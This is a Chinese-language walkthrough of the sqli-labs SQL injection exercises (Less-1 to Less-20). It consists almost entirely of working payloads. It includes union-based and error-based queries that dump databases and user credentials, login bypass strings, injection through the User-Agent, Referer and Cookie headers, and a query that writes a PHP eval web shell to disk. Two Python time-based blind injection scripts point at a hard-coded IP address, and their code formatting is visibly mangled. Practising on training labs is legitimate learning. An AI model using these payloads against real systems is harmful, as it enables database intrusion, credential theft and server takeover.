Less-1
?id=1' order by 3#正常
?id=1' order by 4#Unknown column '4' in 'order clause'
?id=666' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+# information_schema,challenges,mysql,performance_schema,security
?id=666' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 'security')--+# emails,referers,uagents,users
?id=666' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name = 'users')--+# id,username,password
?id=666' union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+# Dumb,Angelina, Dummy, secure,stupid, superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4# Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Less-2# 方法同上,不過此題爲數值查詢
?id=666 union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)
Less-3
?id=666') union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+
Less-4
?id=666") union select 1,(select group_concat(username)from security.users),(select group_concat(password)from security.users)--+
Less-5# 頁面沒有顯示位。無法使用聯合查詢注入 採用報錯注入# and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)
?id=1' and(select 1from(select count(*),concat(((select group_concat(schema_name)from information_schema.schemata)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Subquery returns more than 1 row
?id=1' and (select 1 from (select count(*),concat(((select concat(schema_name,';')from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Duplicate entry 'security;1' for key 'group_key'
?id=1' and (select 1 from (select count(*),concat(((select concat(table_name,";") from information_schema.tables where table_schema = 'security' limit 3,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)--+# Duplicate entry 'users;1' for key 'group_key'# 以此類推
Less-6# 把'換成"
Less-7
?id=-1')) union select "<?php @eval($_POST['my']);?>" into outfile "path" --+# 一句話連上即可
Less-8# '))改爲'
Less-9&10#區別是前者'後者"#經過測試發現本題是時間盲注,附上腳本:# coding:utf-8import requests
import datetime
defdatabase_len(url):# 獲取數據庫名長度for i inrange(1,10):
payload ='''?id=1' and if(length(database())>%s,sleep(1),0)'''% i
time1 = datetime.datetime.now()
r = requests.get(url + payload +'%23')
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=1:print(i)else:print(i)breakprint('database_len:', i)return i
defdatabase_name(url, database_len):# 獲取數據庫名
name =''for j inrange(1, database_len +1):for i in'0123456789abcdefghijklmnopqrstuvwxyz':
payload ='''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)'''%(
j, i)# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload +'%23')
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=1:
name += i
print(name)breakprint('database_name:', name)
url ='''http://43.247.91.228:84/Less-9/'''
database_len = database_len(url)
database_name(url, database_len)#database_name: security
Less-11
?uname=' or '1'='1&passwd=1'union select 1,(select group_concat(schema_name)from information_schema.schemata)#&submit=Submit#' or '1'='1繞過
Less-12
?uname=") or ("1")=("1&passwd=1")union select 1,(select group_concat(schema_name)from information_schema.schemata)#&submit=Submit#") or ("1")=("1繞過
Less-13
?uname=1')and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1)))##>XPATH syntax error: ':security'
或者
?uname=1')and(select 1from(select count(*),concat(((select concat(schema_name," | ")from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)## Duplicate entry 'security | 1' for key 'group_key'
Less-14
把')換成"
Less-15#沒有啥反應哈,試了試萬能密碼確定是',然後進行時間盲注,對之前的腳本做了個升級哈,這次是多線程# coding:utf-8import requests
import datetime
import threading
defdatabase_len(url, i):
postdata ={'uname':'''admin' and if(length(database())>%s,sleep(2),0) #'''% i,'passwd':'''1'''}
time1 = datetime.datetime.now()
r = requests.post(url, data=postdata)
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=2:returnTrueelse:returnFalsedefdatabase_name(url, j):# 獲取數據庫名for i in'0123456789abcdefghijklmnopqrstuvwxyz':
postdata ={'uname':'''admin' and if(substr(database(),%d,1)='%s',sleep(2),1) #'''%(j, i),'passwd':'''1'''}# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.post(url, data=postdata)
time2 = datetime.datetime.now()
sec =(time2 - time1).seconds
if sec >=2:return i
classMyThread(threading.Thread):def__init__(self, func, args):
threading.Thread.__init__(self)
self.func = func
self.args = args
defgetresult(self):return self.res
defrun(self):
self.res = self.func(*self.args)defmain():
flag =True
url ='''http://43.247.91.228:84/Less-15/'''while flag:
threads =[]for i inrange(0,9):
t = MyThread(database_len,(url, i +1))
threads.append(t)
threads[i].start()for i inrange(0,9):
threads[i].join()ifnot threads[i].getresult():
flag =False
databaselength = i +1print('database_len:', databaselength)break
threads =[]
name =''for i inrange(0, databaselength):
t = MyThread(database_name,(url, i +1))
threads.append(t)
threads[i].start()for i inrange(0, databaselength):
threads[i].join()
name += threads[i].getresult()print("database_name :"+ name)if __name__ =='__main__':
main()#database_len: 8#database_name :security
Less-16
'改成")
Less-17#嘗試了一會兒發現這裏只有知道用戶名才能進行注入哈,隨便試了個admin發現可以,在密碼發現有語法報錯,於是採用報錯注入
?uname=admin&passwd=1' and(select 1from(select count(*),concat(((select concat(schema_name," | ")from information_schema.schemata limit 4,1)),floor (rand(0)*2))x from information_schema.tables group by x)a)#&submit=Submit
Less-18#發現頁面會返回ip和user-agent,改了下xxf發現不行呀,於是嘗試在user-agent注入
User-Agent:1' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1# XPATH syntax error:':security'
Less-19#顯示位在referer,所以嘗試在這裏注入
Referer:1' and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 4, 1)),floor (rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
uname=admin&passwd=admin&submit=Submit
#"security;1"
Less-20#在cookie裏面注入
Cookie: uname=' and extractvalue(1,concat(":",(select schema_name from information_schema.schemata limit 4,1))) and '1'='1